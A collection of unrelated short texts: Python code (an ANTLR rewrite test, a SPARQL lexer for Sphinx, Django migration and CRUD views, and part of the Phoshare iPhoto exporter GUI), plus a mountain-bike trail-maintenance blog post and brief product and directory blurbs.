'''
            )

        input = textwrap.dedent(
            '''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
            )

        lexerCls, parserCls = self.compileInlineGrammar(grammar)

        cStream = antlr3.StringStream(input)
        lexer = lexerCls(cStream)
        # TokenRewriteStream (not CommonTokenStream) is required so the
        # template rewrites can be applied to the original text.
        tStream = antlr3.TokenRewriteStream(lexer)
        parser = parserCls(tStream)
        result = parser.prog()

        found = tStream.toString()

        expected = textwrap.dedent(
            '''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
            )

        self.failUnlessEqual(expected, found)

    def testTreeRewrite(self):
        """rewrite=true in a tree grammar walking the AST produced by a
        separate parser grammar."""
        grammar = textwrap.dedent(
            r'''grammar T6;
options {
language=Python;
output=AST;
}
tokens {
BLOCK;
ASSIGN;
}
prog: stat+;
stat
: IF '(' e=expr ')' s=stat
-> ^(IF $e $s)
| RETURN expr ';'
-> ^(RETURN expr)
| '{' stat* '}'
-> ^(BLOCK stat*)
| ID '=' expr ';'
-> ^(ASSIGN ID expr)
;
expr
: ID
| INT
;
IF: 'if';
RETURN: 'return';
ID: 'a'..'z'+;
INT: '0'..'9'+;
WS: (' '|'\n')+ {$channel=HIDDEN;} ;
COMMENT: '/*' (options {greedy=false;} : .)* '*/' {$channel = HIDDEN;} ;
'''
            )

        treeGrammar = textwrap.dedent(
            r'''tree grammar T6Walker;
options {
language=Python;
tokenVocab=T6;
ASTLabelType=CommonTree;
output=template;
rewrite=true;
}
prog: stat+;
stat
: ^(IF expr stat)
| ^(RETURN return_expr)
| ^(BLOCK stat*)
| ^(ASSIGN ID expr)
;
return_expr
: expr
-> template(t={$text}) <<boom(<t>)>>
;
expr
: ID
| INT
;
'''
            )

        input = textwrap.dedent(
            '''\
if ( foo ) {
b = /* bla */ 2;
return 1 /* foo */;
}
/* gnurz */
return 12;
'''
            )

        lexerCls, parserCls = self.compileInlineGrammar(grammar)
        # For a tree grammar, compileInlineGrammar returns just the walker
        # class (no lexer), hence no tuple unpacking here.
        walkerCls = self.compileInlineGrammar(treeGrammar)

        cStream = antlr3.StringStream(input)
        lexer = lexerCls(cStream)
        tStream = antlr3.TokenRewriteStream(lexer)
        parser = parserCls(tStream)
        tree = parser.prog().tree

        nodes = antlr3.tree.CommonTreeNodeStream(tree)
        # The node stream needs the token stream so $text and the rewrite
        # machinery can reach the original characters.
        nodes.setTokenStream(tStream)
        walker = walkerCls(nodes)
        walker.prog()

        found = tStream.toString()

        expected = textwrap.dedent(
            '''\
if ( foo ) {
b = /* bla */ 2;
return boom(1) /* foo */;
}
/* gnurz */
return boom(12);
'''
            )

        self.failUnlessEqual(expected, found)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
Handpicked Top 3 Cardiologists in Kansas City, Missouri. They face a rigorous 50-Point Inspection, which includes customer reviews, history, complaints, ratings, satisfaction, trust, cost and general excellence. You deserve the best!
|
# -*- coding: utf-8 -*-
"""
sparqllexer
~~~~~~~~~~~
Extension to add a sparql lexer to Sphinx.
``http://sphinx.pocoo.org/ext/appapi.html?highlight=pygments#sphinx.application.Sphinx.add%5Flexer``
It uses the Kier Davis code: ``https://github.com/kierdavis/SparqlLexer``.
.. code-block:: sparql
Sparql example TODO
changelog
`````````
2013-21-21: pchampin: added incomplete support for functions
2012-11-27: pchampin: improved a number of token definition
"""
from pygments.lexer import RegexLexer, bygroups
from pygments.formatter import Formatter
from pygments.token import *
# Regex fragments for prefixed names: a PREFIX must start with a letter,
# a NAME may also start with an underscore.
PREFIX = r"[a-zA-Z][-_a-zA-Z0-9]*"
NAME = r"[_a-zA-Z][-_a-zA-Z0-9]*"
class SparqlLexer(RegexLexer):
    """Pygments lexer for SPARQL (and, loosely, Turtle) sources.

    Rules are tried in order, so prefixed names, variables and IRIs are
    matched before the keyword alternations.
    """

    name = "Sparql"
    aliases = ["sparql", "ttl"]
    filenames = ["*.ttl"]
    alias_filenames = ["*.txt"]
    mimetypes = ["text/x-sparql", "text/sparql", "application/sparql"]

    tokens = {
        "root": [
            (r"#.*\n", Comment.Single),
            (r",|;|\.|\(|\)|\[|\]|\{|\}|\^\^", Punctuation),
            ("(%s)?\:(%s)?" % (PREFIX, NAME), Name.Tag),
            (r"_\:%s" % NAME, Name.Variable),
            (r"[\$\?]%s" % NAME, Name.Variable),
            (r"<[^>]*>", Name.Constant),
            # Fix: non-greedy so two literals on one line ('"a" "b"') are not
            # merged into a single String token, and '*' (instead of '+') so
            # the empty literal "" is accepted.
            # NOTE(review): backslash-escaped quotes inside literals are
            # still not handled — confirm whether that is needed.
            (r"(['\"]).*?\1", String.Double),
            (r"\d+(\.\d*)?([eE][+\-]?\d+)?", Number),
            (r"\.\d+([eE][+\-]?\d+)?", Number),
            (r"\s+", Whitespace),
            (r"true|false", Keyword.Constant),
            (r"(?i)prefix|select|construct|ask|describe|where|from|as|graph|filter"
             "|optional|a|union|not exists", Keyword.Reserved),
            (r"(?i)distinct|reduced|group by|order by|limit|offset|asc|desc",
             Keyword.Reserved),
            (r"(?i)count|sum|avg|min|max|groupconcat|sample",
             Keyword.Reserved),
            (r"(?i)delete|insert|data|load|clear|create|drop|copy|move|add",
             Keyword.Reserved),
            (r"(?i)regex",
             Keyword.Function),
            (r"\+|-|\*|/|=|!|<|>|\&|\|", Punctuation),
            # Fix: consume a single unrecognized character at a time so the
            # lexer recovers at the next token, instead of the previous
            # greedy r".+" which flagged the whole rest of the line as one
            # Error token.
            (r".", Error),
        ],
    }
def setup(app):
    """Sphinx extension entry point: registers the SPARQL lexer under the
    'sparql' alias so code-blocks can use it."""
    # An instance of the lexer is required
    sparqlLexer = SparqlLexer()
    app.add_lexer('sparql', sparqlLexer)
|
First I must define pig as some have been taking exception to that phrase being used to describe their bike. Let it be known that pig is not meant to be derogatory, rather it's just easier to say pig than, big huge monster bike with over 5 inches of travel front and back. However, now I can see why downhillers/freeriders/anyone with a pig, gets very defensive when people mention their bikes.
Allow me to explain. Recently I decided to bite the bullet, and the bank account to buy a pig from Corsa Cycles. Let me tell you it was the best decision I've ever made. Dave, Troy and Easy helped me pick out the perfect bike and now with their fancy new digs in Squamish Station, they're always ready to step up to any scenario. However, there was one thing they didn't prepare me for. I wasn't prepared for the unanimous reaction from "the people" once I decided to hop on the plush bandwagon and become a member of the 5 & 5 club.
The people: "Oh, you're one of THOSE now."
The people: "A Shuttler. You know one of those lazy bastards who drive their bikes to the top of Diamond Head, rip up the trail then drive back to your North Van. home never once helping on a trail maintenance day."
Me: "Oh one of those."
Well how do you like them apples. It seems without even trying that I'm thrown bike first into another battle in Squamish. I'm just Thankful there's nary a woodchip to be seen. No, this battle is between the cardio freaks who bike up, and the lazy bastards who drive up. The main problem is that wording exactly. "Lazy bastards" It's assumed that shuttlers are in fact lazy and therefore never give back and maintain the trails. While this may be true in some circumstances, generally the car droppers I know all have their own trails, and they're first with the coffee and a safety meeting when a maintenance day is announced. But of course, like anything there are the bad apples who ruin the bunch.
Well, if not a solution, at least it's a step to recognizing the problem.
Do these shuttle tourists even know about maintenance days? Well they won't have that excuse for long now that you're armed with this!
Just print this page, photocopy the coupon-like flyer and keep a couple of copies in your camel pack. Then, when you come upon a truck parked at the top of a grueling climb, take a moment from your cursing of their gasoline guts, and politely place one of these informational flyers on their windshield.
If nothing else, it will give them one less excuse to not come out to a maintenance day.
So you've decided to shuttle.
First, apologies for resorting to a windshield flyer. But rest assured that this is not an offer to lose weight, learn a trade, or change religions.
It is, however, an offer to close the ever-widening gap between those that shuttle (AKA: car drop) and those that pedal their bikes up the hill.
Either way we're both lucky enough to enjoy some of the most incredible mountain bike trails around. Unfortunately, trails don't fix themselves.
It is here that a request be made.
Please, enjoy your day on our world class trails. Then a couple times a season, give a little back and get involved in a maintenance day.
WHERE & WHEN? Just phone one of the bike shops (Corsa, Tantalus) there are people fixing up the trails every day, and they would love some help.
Just help put it back when you're done.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
    # Initial schema for django_price: a Tax base table plus LinearTax and
    # MultiTax subclasses using multi-table inheritance, with a
    # ContentType pointer (_poly_ct) for polymorphic lookups.

    dependencies = [
        # _poly_ct below references contenttypes, so it must migrate first.
        ('contenttypes', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Tax',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=25)),
                # `created` is set once at creation; `modified` updates on
                # every save (auto_now).
                ('created', models.DateTimeField(default=datetime.datetime.now, editable=False)),
                ('modified', models.DateTimeField(auto_now=True)),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='LinearTax',
            fields=[
                # Multi-table-inheritance link back to Tax.
                ('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
                ('percent', models.DecimalField(max_digits=6, decimal_places=3)),
            ],
            options={
                'abstract': False,
            },
            bases=('django_price.tax',),
        ),
        migrations.CreateModel(
            name='MultiTax',
            fields=[
                ('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
            ],
            options={
                'abstract': False,
            },
            bases=('django_price.tax',),
        ),
        migrations.AddField(
            model_name='tax',
            name='_poly_ct',
            field=models.ForeignKey(related_name='+', editable=False, to='contenttypes.ContentType'),
        ),
        migrations.AddField(
            model_name='multitax',
            name='taxes',
            # A MultiTax aggregates several Tax rows.
            field=models.ManyToManyField(related_name='+', to='django_price.Tax'),
        ),
    ]
|
Softening and moisturizing face mask for tired and dull skin. The highly absorbent properties of white clay it contains, combined with Dictamelia* and grapefruit extracts, cleanse the skin gently and deeply, removing the impurities that cause dullness. Moreover Licorice extract soothes and calms. The skin feels clarified, tonified and rejuvenated.
USAGE: Apply a rich layer on perfectly cleansed face and neck. Leave it for 10 minutes, rinse with lukewarm water and proceed with the tonic lotion.
Frequency: 1-2 times a week.
|
# -*- coding: UTF-8 -*-
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from meregistro.shortcuts import my_render
from apps.seguridad.decorators import login_required, credential_required
from django.core.paginator import Paginator
class CrudConfig:
    """Value object tying a model class to its edit form, its filter form
    and the template directory used by the generic CRUD views."""

    def __init__(self, model_class, form_class, form_filter_class, template_dir):
        self.template_dir = template_dir
        self.form_filter_class = form_filter_class
        self.form_class = form_class
        self.model_class = model_class
from apps.registro.models import AutoridadCargo
from apps.registro.forms import AutoridadCargoForm, AutoridadCargoFormFilters
from apps.registro.models import Departamento
from apps.registro.forms import DepartamentoForm, DepartamentoFormFilters
from apps.registro.models import Localidad
from apps.registro.forms import LocalidadForm, LocalidadFormFilters
from apps.registro.models import Jurisdiccion
from apps.registro.forms import JurisdiccionForm, JurisdiccionFormFilters
from apps.registro.models import TipoGestion
from apps.registro.forms import TipoGestionForm, TipoGestionFormFilters
from apps.registro.models import TipoSubsidio
from apps.registro.forms import TipoSubsidioForm, TipoSubsidioFormFilters
from apps.registro.models import OrigenNorma
from apps.registro.forms import OrigenNormaForm, OrigenNormaFormFilters
from apps.registro.models import TipoNorma
from apps.registro.forms import TipoNormaForm, TipoNormaFormFilters
from apps.registro.models import TipoDomicilio
from apps.registro.forms import TipoDomicilioForm, TipoDomicilioFormFilters
from apps.registro.models import TipoCompartido
from apps.registro.forms import TipoCompartidoForm, TipoCompartidoFormFilters
from apps.registro.models import TipoConexion
from apps.registro.forms import TipoConexionForm, TipoConexionFormFilters
from apps.registro.models import TipoDependenciaFuncional
from apps.registro.forms import TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters
from apps.titulos.models import Carrera
from apps.titulos.forms import CarreraForm, CarreraFormFilters
from apps.titulos.models import TipoTitulo
from apps.titulos.forms import TipoTituloForm, TipoTituloFormFilters
# Registry mapping each CRUD slug (as used in URLs) to its configuration.
cruds = {
    'autoridad_cargo': CrudConfig(AutoridadCargo, AutoridadCargoForm, AutoridadCargoFormFilters, 'backend/autoridad_cargo/'),
    'departamento': CrudConfig(Departamento, DepartamentoForm, DepartamentoFormFilters, 'backend/departamento/'),
    'localidad': CrudConfig(Localidad, LocalidadForm, LocalidadFormFilters, 'backend/localidad/'),
    'jurisdiccion': CrudConfig(Jurisdiccion, JurisdiccionForm, JurisdiccionFormFilters, 'backend/jurisdiccion/'),
    'tipo_gestion': CrudConfig(TipoGestion, TipoGestionForm, TipoGestionFormFilters, 'backend/tipo_gestion/'),
    'tipo_subsidio': CrudConfig(TipoSubsidio, TipoSubsidioForm, TipoSubsidioFormFilters, 'backend/tipo_subsidio/'),
    'origen_norma': CrudConfig(OrigenNorma, OrigenNormaForm, OrigenNormaFormFilters, 'backend/origen_norma/'),
    'tipo_norma': CrudConfig(TipoNorma, TipoNormaForm, TipoNormaFormFilters, 'backend/tipo_norma/'),
    'tipo_domicilio': CrudConfig(TipoDomicilio, TipoDomicilioForm, TipoDomicilioFormFilters, 'backend/tipo_domicilio/'),
    'tipo_compartido': CrudConfig(TipoCompartido, TipoCompartidoForm, TipoCompartidoFormFilters, 'backend/tipo_compartido/'),
    'tipo_conexion': CrudConfig(TipoConexion, TipoConexionForm, TipoConexionFormFilters, 'backend/tipo_conexion/'),
    'tipo_dependencia_funcional': CrudConfig(TipoDependenciaFuncional, TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters, 'backend/tipo_dependencia_funcional/'),
    'carrera': CrudConfig(Carrera, CarreraForm, CarreraFormFilters, 'backend/carrera/'),
    'tipo_titulo': CrudConfig(TipoTitulo, TipoTituloForm, TipoTituloFormFilters, 'backend/tipo_titulo/'),
}

# Page size used by the list views.
ITEMS_PER_PAGE = 50
@credential_required('seg_backend')
def index(request, crud_name):
    """Generic paginated list view for the CRUD identified by `crud_name`."""
    config = cruds[crud_name]

    if request.method == 'GET':
        # Bind the filter form to the query string so filters are applied
        # (and survive paging links).
        form_filter = config.form_filter_class(request.GET)
    else:
        form_filter = config.form_filter_class()
    q = build_query(form_filter, 1)

    paginator = Paginator(q, ITEMS_PER_PAGE)
    try:
        page_number = int(request.GET['page'])
    except (KeyError, ValueError):
        # Missing or non-numeric page parameter: fall back to page 1.
        page_number = 1
    # Clamp the requested page into the valid range.
    if page_number < 1:
        page_number = 1
    elif page_number > paginator.num_pages:
        page_number = paginator.num_pages
    page = paginator.page(page_number)
    objects = page.object_list

    return my_render(request, config.template_dir + 'index.html', {
        'form_filters': form_filter,
        'objects': objects,
        'paginator': paginator,
        'page': page,
        'page_number': page_number,
        'pages_range': range(1, paginator.num_pages + 1),
        'next_page': page_number + 1,
        'prev_page': page_number - 1
    })
def build_query(filters, page):
    """
    Builds the search queryset from the bound filter form.

    NOTE(review): `page` is currently unused here — pagination is applied
    by the caller via Paginator; confirm before removing it.
    """
    return filters.buildQuery()
@credential_required('seg_backend')
def create(request, crud_name):
    """Generic create view: renders an empty form and, on a valid POST,
    saves the object and redirects to its edit view."""
    config = cruds[crud_name]
    if request.method == 'POST':
        form = config.form_class(request.POST)
        if form.is_valid():
            obj = form.save()
            request.set_flash('success', 'Datos guardados correctamente.')
            # Redirect to the edit view of the newly created object.
            return HttpResponseRedirect(reverse('crudEdit', args=[crud_name, obj.id]))
        else:
            # Invalid form: fall through and re-render it with errors.
            request.set_flash('warning', 'Ocurrió un error guardando los datos.')
    else:
        form = config.form_class()
    return my_render(request, config.template_dir + 'new.html', {
        'form': form,
        'is_new': True,
    })
@credential_required('seg_backend')
def edit(request, crud_name, obj_id):
    """Generic edit view: renders the object's form and saves it on a
    valid POST, re-rendering the same page either way."""
    config = cruds[crud_name]
    # NOTE(review): .get() raises DoesNotExist (HTTP 500) for an unknown
    # id — confirm whether a 404 would be preferable here.
    obj = config.model_class.objects.get(pk=obj_id)
    if request.method == 'POST':
        form = config.form_class(request.POST, instance=obj)
        if form.is_valid():
            obj = form.save()
            request.set_flash('success', 'Datos actualizados correctamente.')
        else:
            request.set_flash('warning', 'Ocurrió un error actualizando los datos.')
    else:
        form = config.form_class(instance=obj)
    return my_render(request, config.template_dir + 'edit.html', {
        'form': form,
        'obj': obj,
    })
@credential_required('seg_backend')
def delete(request, crud_name, obj_id):
    """Generic delete view; always redirects back to the list view."""
    config = cruds[crud_name]
    obj = config.model_class.objects.get(pk=obj_id)
    try:
        obj.delete()
        request.set_flash('success', 'Registro eliminado correctamente.')
    except Exception as e:
        # Deletion is assumed to fail because the row is referenced
        # elsewhere (integrity error); report it instead of crashing.
        print e
        request.set_flash('warning', 'No se puede eliminar el elemento porque está en uso.')
    return HttpResponseRedirect(reverse('crudList', args=[crud_name]))
|
Three-part construction. Iron core. Original black paint. Unmarked. Nicely worn in good condition.
|
"""Reads iPhoto library info, and exports photos and movies. GUI version."""
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cStringIO
import logging
import os
import platform
import threading
import tkFileDialog
import tkMessageBox
import traceback
# pylint: disable-msg=W0614
from Tkinter import * #IGNORE:W0401
from ttk import *
import appledata.iphotodata as iphotodata
import phoshare.phoshare_main as phoshare_main
import phoshare.phoshare_version as phoshare_version
import tilutil.exiftool as exiftool
import tilutil.systemutils as su
from ScrolledText import ScrolledText
import ConfigParser
import Queue
_CONFIG_PATH = su.expand_home_folder('~/Library/Application Support/Google/'
'Phoshare/phoshare.cfg')
_BOLD_FONT = ('helvetica', 12, 'bold')
_logger = logging.getLogger('google')
def _int_from_bool(boolean_value):
"""Converts a boolean value to an integer of 0 or 1."""
if boolean_value:
return 1
return 0
class HelpDialog(Toplevel):
    """Displays a help dialog, using a scrolled text area."""

    def __init__(self, parent, text, title="Phoshare Help"):
        """Creates a help window over `parent` showing read-only `text`."""
        Toplevel.__init__(self, parent)
        self.transient(parent)  # keep the dialog associated with its parent
        self.title(title)
        self.parent = parent
        t = ScrolledText(self)
        t.insert(END, text)
        t.config(state=DISABLED)  # make the text read-only
        t.pack()
class ExportApp(Frame):
"""GUI version of the Phoshare tool."""
def __init__(self, master=None):
    """Initialize the app, setting up the UI."""
    Frame.__init__(self, master, padding=10)

    # Build the menu bar: the application ("apple") menu and a Help menu.
    top = self.winfo_toplevel()
    menu_bar = Menu(top)
    top["menu"] = menu_bar
    apple = Menu(menu_bar, name='apple')
    menu_bar.add_cascade(label='Phoshare', menu=apple)
    apple.add_command(label="About Phoshare", command=self.__aboutHandler)
    sub_menu = Menu(menu_bar, name='help')
    menu_bar.add_cascade(label="Help", menu=sub_menu)
    sub_menu.add_command(label="Phoshare Help", command=self.help_buttons)

    # Queue used by background threads to hand results back to the UI.
    self.thread_queue = Queue.Queue(maxsize=100)
    self.active_library = None

    top.columnconfigure(0, weight=1)
    top.rowconfigure(0, weight=1)
    self.grid(sticky=N+S+E+W)

    self.valid_library = False
    self.exiftool = False  # set True in init() if exiftool is available

    # Tk variables and widget references backing the export options.
    self.iphoto_library = StringVar()
    self.iphoto_library_status = StringVar()
    self.browse_library_button = None
    self.export_folder = StringVar()
    self.library_status = None
    self.dryrun_button = None
    self.export_button = None
    self.text = None
    self.events = StringVar()
    self.albums = StringVar()
    self.smarts = StringVar()
    self.foldertemplate = StringVar()
    self.nametemplate = StringVar()
    self.captiontemplate = StringVar()
    self.update_var = IntVar()
    self.delete_var = IntVar()
    self.originals_var = IntVar()
    self.link_var = IntVar()
    self.folder_hints_var = IntVar()
    self.faces_box = None
    self.faces_var = IntVar()
    self.face_keywords_box = None
    self.face_keywords_var = IntVar()
    self.face_albums_var = IntVar()
    self.face_albums_text = StringVar()
    self.iptc_box = None
    self.iptc_all_box = None
    self.iptc_var = IntVar()
    self.iptc_all_var = IntVar()
    self.gps_box = None
    self.gps_var = IntVar()
    self.verbose_var = IntVar()

    self.info_icon = PhotoImage(file="info-b16.gif")

    self.create_widgets()

    # Set up logging so it gets redirected to the text area in the app.
    self.logging_handler = logging.StreamHandler(self)
    self.logging_handler.setLevel(logging.WARN)
    _logger.addHandler(self.logging_handler)
def __aboutHandler(self):
    """Shows the About dialog with version and build information."""
    HelpDialog(self, """%s %s
Copyright 2010 Google Inc.
http://code.google.com/p/phoshare""" % (phoshare_version.PHOSHARE_VERSION,
                                        phoshare_version.PHOSHARE_BUILD),
               title="About Phoshare")
def init(self):
    """Initializes processing by launching background thread checker and
    initial iPhoto library check."""
    self.thread_checker()
    # NOTE(review): `sys` is not imported explicitly in this file; it is
    # presumably leaked by `from Tkinter import *` — confirm.
    if exiftool.check_exif_tool(sys.stdout):
        # exiftool is available, so enable the metadata-related options.
        self.exiftool = True
        self.faces_box.configure(state=NORMAL)
        self.face_keywords_box.configure(state=NORMAL)
        self.iptc_box.configure(state=NORMAL)
        self.iptc_all_box.configure(state=NORMAL)
        self.gps_box.configure(state=NORMAL)

    # Load saved options and populate the UI from them.
    options = self.Options()
    options.load()
    self.init_from_options(options)
    self.check_iphoto_library()
def init_from_options(self, options):
    """Populates the UI from options."""
    self.iphoto_library.set(options.iphoto)
    self.export_folder.set(options.export)
    self.albums.set(su.fsdec(options.albums))
    self.events.set(su.fsdec(options.events))
    self.smarts.set(su.fsdec(options.smarts))
    self.foldertemplate.set(su.unicode_string(options.foldertemplate))
    self.nametemplate.set(su.unicode_string(options.nametemplate))
    self.captiontemplate.set(su.unicode_string(options.captiontemplate))
    self.update_var.set(_int_from_bool(options.update))
    self.delete_var.set(_int_from_bool(options.delete))
    self.originals_var.set(_int_from_bool(options.originals))
    self.link_var.set(_int_from_bool(options.link))
    self.folder_hints_var.set(_int_from_bool(options.folderhints))
    # Metadata options are only honored when exiftool is available.
    self.faces_var.set(_int_from_bool(options.faces) and self.exiftool)
    self.face_keywords_var.set(_int_from_bool(options.face_keywords) and
                               self.exiftool)
    self.face_albums_var.set(_int_from_bool(options.facealbums))
    self.face_albums_text.set(options.facealbum_prefix)
    if options.iptc and self.exiftool:
        self.iptc_var.set(1)
        # options.iptc == 2 appears to mean "apply IPTC to all files" —
        # TODO confirm against the Options definition.
        if options.iptc == 2:
            self.iptc_all_var.set(1)
    self.gps_var.set(_int_from_bool(options.gps) and self.exiftool)
    def _add_section(self, container, text, help_command):
        """Adds a new UI section with a bold label and an info button.

        Args:
            container: UI element that will contain this new item
            text: label frame text.
            help_command: command to run when the info button is pressed.

        Returns: tuple of (section frame, content frame); callers grid the
            section frame and put their widgets into the content frame.
        """
        section_frame = Frame(container)
        section_frame.columnconfigure(0, weight=1)
        # Bold heading on the left of the section header row...
        label = Label(section_frame, text=text)
        label.config(font=_BOLD_FONT)
        label.grid(row=0, column=0, sticky=W, pady=5)
        # ...and the info ("?") button on the right.
        Button(section_frame, image=self.info_icon,
               command=help_command).grid(row=0, column=1, sticky=E)
        # Second row spans both columns and holds the caller's content.
        content_frame = Frame(section_frame)
        content_frame.grid(row= 1, column=0, columnspan=2, sticky=N+S+E+W, pady=5)
        return (section_frame, content_frame)
    def _create_button_bar(self, container, row):
        """Creates the button bar with the Dry Run and Export buttons.

        Args:
            container: UI element that will contain the button bar.
            row: row number in grid.

        Returns: next row number in grid.
        """
        button_bar = Frame(container)
        button_bar.grid(row=row, column=0, sticky=E+W, padx=10)
        # Column 0 stretches so the buttons stay right-aligned.
        button_bar.columnconfigure(0, weight=1)
        verbose_box = Checkbutton(button_bar, text="Show debug output", var=self.verbose_var)
        verbose_box.grid(row=0, column=0, sticky=E)
        # Both action buttons start disabled until a valid library is found
        # (see enable_buttons()).
        self.dryrun_button = Button(button_bar, text="Dry Run",
                                    command=self.do_dryrun, state=DISABLED)
        self.dryrun_button.grid(row=0, column=1, sticky=E, pady=5)
        self.export_button = Button(button_bar, text="Export",
                                    command=self.do_export, state=DISABLED)
        self.export_button.grid(row=0, column=2, pady=5)
        return row + 1
    def _create_library_tab(self, library_tab):
        """Builds the "Library" notebook tab: library path chooser plus the
        event/album/smart-album filter fields.

        Note: several grid() calls omit the row option and rely on Tk's
        automatic row assignment, so the statement order matters.
        """
        library_tab.columnconfigure(0, weight=1)
        row = 0
        f = Frame(library_tab)
        # NOTE(review): 'stick' relies on Tk abbreviating option names to
        # 'sticky' -- consider spelling it out.
        f.grid(row=row, columnspan=2, stick=E+W, padx=5, pady=5)
        row += 1
        f.columnconfigure(1, weight=1)
        Label(f, text="iPhoto Library:").grid(sticky=E)
        iphoto_library_entry = Entry(f, textvariable=self.iphoto_library)
        iphoto_library_entry.grid(row=0, column=1, sticky=E+W)
        self.browse_library_button = Button(f, text="Browse...",
                                            command=self.browse_library)
        self.browse_library_button.grid(row=0, column=2)
        # Status line below the entry, updated by set_library_status().
        self.library_status = Label(f, textvariable=self.iphoto_library_status)
        self.library_status.grid(row=1, column=1, sticky=W)
        (cf, lf) = self._add_section(library_tab, "Events, Albums and Smart Albums",
                                     self.help_events)
        cf.grid(row=row, columnspan=2, stick=E+W)
        row += 1
        lf.columnconfigure(1, weight=1)
        Label(lf, text="Events:").grid(sticky=E)
        events_entry = Entry(lf, textvariable=self.events)
        events_entry.grid(row=0, column=1, sticky=EW)
        Label(lf, text="Albums:").grid(sticky=E)
        albums_entry = Entry(lf, textvariable=self.albums)
        albums_entry.grid(row=1, column=1, sticky=EW)
        Label(lf, text="Smart Albums:").grid(sticky=E)
        smarts_entry = Entry(lf, textvariable=self.smarts)
        smarts_entry.grid(row=2, column=1, columnspan=3, sticky=EW)
    def _create_files_tab(self, files_tab):
        """Builds the "Files" notebook tab: export folder, export options,
        and the folder/file/caption name templates.
        """
        files_tab.columnconfigure(0, weight=1)
        # Export folder and options
        row = 0
        (cf, lf) = self._add_section(files_tab, "Export Folder and Options", self.help_export)
        cf.grid(row=row, columnspan=2, stick=E+W)
        row += 1
        lf.columnconfigure(1, weight=1)
        label = Label(lf, text="Export Folder:")
        label.grid(sticky=E)
        export_folder_entry = Entry(lf, textvariable=self.export_folder)
        export_folder_entry.grid(row=0, column=1, columnspan=2, sticky=E+W)
        Button(lf, text="Browse...",
               command=self.browse_export).grid(row=0, column=3)
        # One checkbox per export option; the bound variables are read in
        # export_thread().
        update_box = Checkbutton(lf, text="Overwrite changed pictures",
                                 var=self.update_var)
        update_box.grid(row=1, column=1, sticky=W)
        originals_box = Checkbutton(lf, text="Export originals",
                                    var=self.originals_var)
        originals_box.grid(row=2, column=1, sticky=W)
        hint_box = Checkbutton(lf, text="Use folder hints",
                               var=self.folder_hints_var)
        hint_box.grid(row=3, column=1, sticky=W)
        delete_box = Checkbutton(lf, text="Delete obsolete pictures",
                                 var=self.delete_var)
        delete_box.grid(row=4, column=1, sticky=W)
        link_box = Checkbutton(lf, text="Use file links", var=self.link_var)
        link_box.grid(row=5, column=1, sticky=W)
        # Templates ----------------------------------------
        (cf, lf) = self._add_section(files_tab, "Name Templates", self.help_templates)
        cf.grid(row=row, columnspan=2, stick=E+W)
        row += 1
        lf.columnconfigure(1, weight=1)
        Label(lf, text="Folder names:").grid(sticky=E)
        foldertemplate_entry = Entry(lf, textvariable=self.foldertemplate)
        foldertemplate_entry.grid(row=0, column=1, sticky=EW)
        Label(lf, text="File names:").grid(sticky=E)
        nametemplate_entry = Entry(lf, textvariable=self.nametemplate)
        nametemplate_entry.grid(row=1, column=1, sticky=EW)
        Label(lf, text="Captions:").grid(sticky=E)
        captiontemplate_entry = Entry(lf, textvariable=self.captiontemplate)
        captiontemplate_entry.grid(row=2, column=1, sticky=EW)
    def _create_metadata_tab(self, metadata_tab):
        """Builds the "Metadata" notebook tab: metadata export options and
        the Faces options.

        The metadata checkboxes start DISABLED; init() enables them when
        exiftool is detected.
        """
        metadata_tab.columnconfigure(0, weight=1)
        row = 0
        # Metadata --------------------------------------------
        (cf, lf) = self._add_section(metadata_tab, "Metadata", self.help_metadata)
        cf.grid(row=row, columnspan=2, stick=E+W)
        row += 1
        self.iptc_box = Checkbutton(lf,
                                    text=("Export metadata (descriptions, "
                                          "keywords, ratings, dates)"),
                                    var=self.iptc_var, state=DISABLED,
                                    command=self.change_iptc_box)
        self.iptc_box.grid(row=0, column=0, columnspan=2, sticky=W)
        self.iptc_all_box = Checkbutton(lf,
                                        text="Check previously exported images",
                                        var=self.iptc_all_var,
                                        command=self.change_metadata_box,
                                        state=DISABLED)
        self.iptc_all_box.grid(row=1, column=0, sticky=W)
        self.gps_box = Checkbutton(lf,
                                   text="Export GPS data",
                                   var=self.gps_var,
                                   command=self.change_metadata_box,
                                   state=DISABLED)
        self.gps_box.grid(row=2, column=0, sticky=W)
        # Faces ---------------------------------------------------
        (cf, lf) = self._add_section(metadata_tab, "Faces", self.help_faces)
        cf.grid(row=row, columnspan=2, stick=E+W)
        row += 1
        lf.columnconfigure(2, weight=1)
        self.faces_box = Checkbutton(lf, text="Copy faces into metadata",
                                     var=self.faces_var, state=DISABLED,
                                     command=self.change_metadata_box)
        self.faces_box.grid(row=0, column=0, sticky=W)
        self.face_keywords_box = Checkbutton(
            lf,
            text="Copy face names into keywords",
            var=self.face_keywords_var,
            command=self.change_metadata_box,
            state=DISABLED)
        self.face_keywords_box.grid(row=1, column=0, sticky=W)
        # Face-folder export works without exiftool, so it is never disabled.
        checkbutton = Checkbutton(lf, text="Export faces into folders",
                                  var=self.face_albums_var)
        checkbutton.grid(row=2, column=0, sticky=W)
        label = Label(lf, text="Faces folder prefix:")
        label.grid(row=2, column=1, sticky=E)
